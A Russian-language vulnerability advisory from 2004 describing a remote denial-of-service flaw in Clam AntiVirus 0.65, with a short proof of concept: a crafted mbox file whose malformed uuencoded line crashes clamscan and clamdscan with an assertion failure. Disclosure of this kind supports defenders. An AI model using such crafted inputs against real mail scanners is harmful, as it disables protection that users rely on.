Удаленый отказ в обслуживании против Clam AntiVirus
| Дата публикации: | 13.02.2004 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1263 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Clam AntiVirus (clamav) 0.x |
| Уязвимые версии: Clam AntiVirus 0.65
Описание: Уязвимость обнаружена в Clam AntiVirus. Удаленный пользователь может аварийно завершить работу программы. Удаленный пользователь может послать email сообщение, содержащее uuencoded строку с некорректным значением длины через email сообщение, чтобы аварийно завершить работу антивируса. Пример/Эксплоит: >How-To-Repeat: Save the following file to ~/clamtest.mbox, removing the leading 'X': XFrom - Xbegin 644 byebye Xbyebye Xend Then do: # clamscan --mbox -v ~/clamtest.mbox assertion "(len >= 0) && (len <= 63)" failed: file "message.c", lin e 887 Abort (core dumped) or # clamdscan -v ~/clamtest.mbox; ps ax | grep clam URL производителя: http://www.clamav.net/ Решение:Неофициальное исправление см. в источнике сообщения. |
|
| Ссылки: | clamav 0.65 remote DOS exploit |